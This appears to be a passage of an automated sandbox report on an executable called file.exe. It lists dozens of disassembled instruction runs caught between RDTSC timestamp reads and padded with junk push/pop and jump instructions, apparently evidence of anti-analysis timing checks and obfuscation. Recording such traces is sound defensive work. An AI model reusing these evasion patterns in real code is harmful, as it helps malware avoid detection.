Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB55D6 second address: DB5611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C2h 0x00000007 jmp 00007FF0BCB462BFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF0BCB462C3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB5756 second address: DB575A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB575A second address: DB5764 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB58B1 second address: DB58B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB58B7 second address: DB58BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB58BB second address: DB58BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB59F7 second address: DB59FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB5C8F second address: DB5C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB5F1A second address: DB5F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB5F21 second address: DB5F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB69A7 second address: DB69BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BAh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB9672 second address: DB9689 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0BC8515D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF0BC8515DBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB9689 second address: DB96A0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0BCB462C2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB96A0 second address: DB96A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB981B second address: DB9821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB9821 second address: DB9827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB9827 second address: DB9847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF0BCB462C6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBE536 second address: DBE53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAEAC second address: DCAEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FF0BCB462B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAEBE second address: DCAEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAEC2 second address: DCAF17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007FF0BCB462BAh 0x00000011 pop eax 0x00000012 push ebx 0x00000013 jne 00007FF0BCB462B6h 0x00000019 jg 00007FF0BCB462B6h 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF0BCB462C8h 0x00000027 jmp 00007FF0BCB462C1h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83B9 second address: DD83BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83BF second address: DD83C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83C3 second address: DD83C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83C7 second address: DD83EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 js 00007FF0BCB462B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83EE second address: DD83F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83F3 second address: DD83F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDC75C second address: DDC760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDC760 second address: DDC770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007FF0BCB462B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF5233 second address: DF5267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FF0BC8515D6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007FF0BC8515D6h 0x00000011 popad 0x00000012 jmp 00007FF0BC8515E7h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push edx 0x0000001a jp 00007FF0BC8515DCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF40DA second address: DF40E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF435C second address: DF4397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FF0BC8515E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FF0BC8515D6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF4503 second address: DF4511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF4511 second address: DF451B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF48EF second address: DF490A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0BCB462BCh 0x00000008 jmp 00007FF0BCB462BAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF490A second address: DF496C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF0BC8515E0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FF0BC8515DAh 0x00000016 jmp 00007FF0BC8515E4h 0x0000001b popad 0x0000001c pushad 0x0000001d jns 00007FF0BC8515D6h 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007FF0BC8515E7h 0x0000002a je 00007FF0BC8515D6h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF4C19 second address: DF4C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnc 00007FF0BCB462B6h 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jp 00007FF0BCB462B6h 0x0000001e popad 0x0000001f jnc 00007FF0BCB462B8h 0x00000025 push eax 0x00000026 push edx 0x00000027 jbe 00007FF0BCB462B6h 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF9542 second address: DF9546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFBFBD second address: DFBFC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC159 second address: DFC15E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC20F second address: DFC26D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ecx 0x0000000e jmp 00007FF0BCB462C8h 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 jmp 00007FF0BCB462C3h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF0BCB462BDh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC26D second address: DFC27A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC4B3 second address: DFC4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC4B9 second address: DFC4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC4BD second address: DFC4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFD802 second address: DFD817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFD817 second address: DFD833 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FF0BCB462B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007FF0BCB462B6h 0x00000015 js 00007FF0BCB462B6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFD833 second address: DFD839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF5D8 second address: DFF5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462BDh 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF5EA second address: DFF5F4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0BC8515E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF5F4 second address: DFF5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490F47 second address: 5490F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007FF0BC8515E8h 0x0000000c adc eax, 7F0B4868h 0x00000012 jmp 00007FF0BC8515DBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ax, di 0x00000022 mov dl, 1Bh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480D97 second address: 5480DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF0BCB462BEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480DC7 second address: 5480DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480DCB second address: 5480DD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480DD1 second address: 5480E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF0BC8515DDh 0x00000013 sbb si, C306h 0x00000018 jmp 00007FF0BC8515E1h 0x0000001d popfd 0x0000001e mov di, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480E16 second address: 5480E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548077A second address: 5480792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480792 second address: 54807C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF0BCB462C6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov dl, cl 0x00000016 push eax 0x00000017 push edx 0x00000018 mov edi, 37EC41CCh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54807C6 second address: 54807D5 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov bx, si 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54806DD second address: 54806E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54806E2 second address: 54806E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480466 second address: 5480498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF0BCB462C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480498 second address: 548049C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548049C second address: 54804A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A029D second address: 54A02AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02AD second address: 54A02BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02BE second address: 54A02C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02C4 second address: 54A02D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02D6 second address: 54A02DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02DA second address: 54A02F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF0BCB462BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490DEC second address: 5490E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BC8515E6h 0x00000009 or eax, 7E03D308h 0x0000000f jmp 00007FF0BC8515DBh 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cl, bl 0x00000020 mov si, 7C6Fh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E28 second address: 5490E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BCB462BBh 0x00000009 adc ecx, 28427BFEh 0x0000000f jmp 00007FF0BCB462C9h 0x00000014 popfd 0x00000015 mov cx, 4847h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E67 second address: 5490E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E79 second address: 5490E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E7D second address: 5490E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E8C second address: 5490E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E90 second address: 5490E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E96 second address: 5490EB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A00F5 second address: 54A00FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C008C second address: 54C0092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0092 second address: 54C0096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0096 second address: 54C00A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00A5 second address: 54C00B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00B4 second address: 54C00BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00BA second address: 54C00BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00BE second address: 54C00C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00C2 second address: 54C00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 push esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00D5 second address: 54C0125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, dl 0x00000005 mov ch, A7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FF0BCB462C0h 0x00000010 mov dword ptr [esp], ecx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FF0BCB462BEh 0x0000001a add cl, FFFFFFB8h 0x0000001d jmp 00007FF0BCB462BBh 0x00000022 popfd 0x00000023 pushad 0x00000024 push eax 0x00000025 pop edx 0x00000026 mov dx, si 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [76FB65FCh] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0125 second address: 54C0129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0129 second address: 54C012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C012D second address: 54C0133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0133 second address: 54C0159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov ecx, 1994C4A9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007FF0BCB462C1h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
